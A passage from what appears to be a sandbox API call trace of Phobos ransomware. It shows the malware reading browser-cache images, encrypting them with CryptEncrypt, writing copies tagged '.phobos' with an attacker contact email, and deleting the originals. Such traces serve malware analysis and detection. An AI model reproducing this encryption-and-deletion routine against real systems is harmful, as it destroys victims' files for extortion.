files\\low\\content.ie5\\9qh4s0gz\\bbegx5f[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.350] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.350] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.350] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgx5f[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegx5f[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.471] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0176.471] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.471] ReadFile (in: hFile=0x17c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x5e5, lpOverlapped=0x0) returned 1 [0176.486] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5f0, dwBufLen=0x5f0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x5f0) returned 1 [0176.486] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x5f0, lpOverlapped=0x0) returned 1 [0176.487] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0176.487] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.487] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0176.487] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.487] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0176.487] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.487] CloseHandle (hObject=0x17c) returned 1 [0176.487] CloseHandle (hObject=0x190) returned 1 [0176.487] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBEgx5f[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbegx5f[1].jpg")) returned 1 [0176.488] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.488] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBg3ODX[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbg3odx[2].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.496] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=243) returned 1 [0176.496] CloseHandle (hObject=0x190) returned 1 [0176.497] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBg3ODX[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbg3odx[2].png")) returned 0x2020 [0176.497] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBg3ODX[2].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbg3odx[2].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBg3ODX[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbg3odx[2].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.497] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.497] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.497] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBg3ODX[2].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbg3odx[2].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.497] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0176.497] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.497] ReadFile (in: hFile=0x190, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xf3, lpOverlapped=0x0) returned 1 [0176.509] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100, dwBufLen=0x100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100) returned 1 [0176.509] WriteFile (in: hFile=0x17c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100, lpOverlapped=0x0) returned 1 [0176.510] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0176.510] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.510] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0176.510] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.510] WriteFile (in: hFile=0x17c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0176.511] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.511] CloseHandle (hObject=0x190) returned 1 [0176.511] CloseHandle (hObject=0x17c) returned 1 [0176.511] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBg3ODX[2].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbg3odx[2].png")) returned 1 [0176.512] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.512] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBn4lUU[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbn4luu[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.514] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=333) returned 1 [0176.514] CloseHandle (hObject=0x17c) returned 1 [0176.514] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBn4lUU[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbn4luu[1].png")) returned 0x2020 [0176.514] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBn4lUU[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbn4luu[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBn4lUU[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbn4luu[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.515] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.515] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBn4lUU[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbn4luu[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.515] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0176.515] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.515] ReadFile (in: hFile=0x17c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x14d, lpOverlapped=0x0) returned 1 [0176.535] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x150, dwBufLen=0x150 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x150) returned 1 [0176.535] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x150, lpOverlapped=0x0) returned 1 [0176.536] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0176.536] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.536] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0176.536] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.536] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0176.537] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.537] CloseHandle (hObject=0x17c) returned 1 [0176.537] CloseHandle (hObject=0x190) returned 1 [0176.537] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBn4lUU[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbn4luu[1].png")) returned 1 [0176.539] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.539] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBwGan9[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbwgan9[1].jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.548] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=14519) returned 1 [0176.548] CloseHandle (hObject=0x190) returned 1 [0176.548] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBwGan9[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbwgan9[1].jpg")) returned 0x2020 [0176.548] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBwGan9[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbwgan9[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBwGan9[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbwgan9[1].jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.549] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.549] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.549] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBwGan9[1].jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbwgan9[1].jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.549] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0176.549] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.549] ReadFile (in: hFile=0x190, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x38b7, lpOverlapped=0x0) returned 1 [0176.572] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x38c0, dwBufLen=0x38c0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x38c0) returned 1 [0176.572] WriteFile (in: hFile=0x17c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x38c0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x38c0, lpOverlapped=0x0) returned 1 [0176.574] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0176.574] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.574] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0176.574] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.574] WriteFile (in: hFile=0x17c, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0176.574] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.574] CloseHandle (hObject=0x190) returned 1 [0176.574] CloseHandle (hObject=0x17c) returned 1 [0176.574] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\BBwGan9[1].jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\bbwgan9[1].jpg")) returned 1 [0176.576] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0176.576] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\benefits-5-mobile[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\benefits-5-mobile[1].png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.589] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=10733) returned 1 [0176.589] CloseHandle (hObject=0x17c) returned 1 [0176.589] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\benefits-5-mobile[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\benefits-5-mobile[1].png")) returned 0x2020 [0176.589] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\benefits-5-mobile[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\benefits-5-mobile[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0176.589] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\benefits-5-mobile[1].png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\benefits-5-mobile[1].png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0176.589] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.589] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0176.589] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Low\\Content.IE5\\9QH4S0GZ\\benefits-5-mobile[1].png.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\temporary internet files\\low\\content.ie5\\9qh4s0gz\\benefits-5-mobile[1].png.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0176.590] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32968) returned 1 [0176.590] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.590] ReadFile (in: hFile=0x17c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x29ed, lpOverlapped=0x0) returned 1 [0176.680] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x29f0, dwBufLen=0x29f0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x29f0) returned 1 [0176.681] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x29f0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x29f0, lpOverlapped=0x0) returned 1 [0176.682] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d68) returned 1 [0176.682] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0176.682] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0176.682] CryptDestroyKey (hKey=0xa32d68) returned 1 [0176.682] WriteFile (in: hFile=0x190, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x112, lpOverlapped=0x0) returned 1 [0176.682] CryptDestroyKey (hKey=0xa32968) returned 1 [0176.682] CloseHandle (hObject=0x17c) returned 1 [0176.682] CloseHandle (hObject=0x190) returned 1 